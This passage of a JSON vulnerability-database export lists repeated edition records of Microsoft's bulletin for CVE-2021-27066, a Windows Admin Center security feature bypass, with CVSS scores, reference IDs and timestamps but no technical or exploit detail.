"cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-19T18:46:39", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-19T14:48:13", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-19T14:48:13", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T18:46:39", "differentElements": ["msAffectedSoftware"], "edition": 80}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-19T20:57:02", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-19T14:48:13", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-19T14:48:13", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T20:57:02", "differentElements": ["msAffectedSoftware"], "edition": 81}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-20T02:43:48", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-20T02:43:48", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-20T02:43:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T02:43:48", "differentElements": ["msAffectedSoftware"], "edition": 82}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "147b33fd4a882be2f9bae99b8c4f5ca5", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-20T04:45:52", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-20T02:43:48", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-20T02:43:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T04:45:52", "differentElements": ["msAffectedSoftware"], "edition": 83}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-20T06:48:35", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-20T02:43:48", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-20T02:43:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T06:48:35", "differentElements": ["msAffectedSoftware"], "edition": 84}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "7d75ff58c8e8112121b7aec12131868c", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-20T08:43:58", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-20T02:43:48", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-20T02:43:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T08:43:58", "differentElements": ["msAffectedSoftware"], "edition": 85}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-20T10:54:20", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-20T02:43:48", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-20T02:43:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T10:54:20", "differentElements": ["msAffectedSoftware"], "edition": 86}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "147b33fd4a882be2f9bae99b8c4f5ca5", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-20T12:45:32", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-20T02:43:48", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-20T02:43:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T12:45:32", "differentElements": ["msAffectedSoftware"], "edition": 87}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-20T14:57:00", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-20T14:57:00", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-20T14:57:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T14:57:00", "differentElements": ["msAffectedSoftware"], "edition": 88}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-21T08:55:13", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-20T14:57:00", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-20T14:57:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-21T08:55:13", "differentElements": ["msAffectedSoftware"], "edition": 89}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-21T10:45:34", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-21T10:45:34", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-21T10:45:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-21T10:45:34", "differentElements": ["msAffectedSoftware"], "edition": 90}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-25T23:07:21", "history": [], 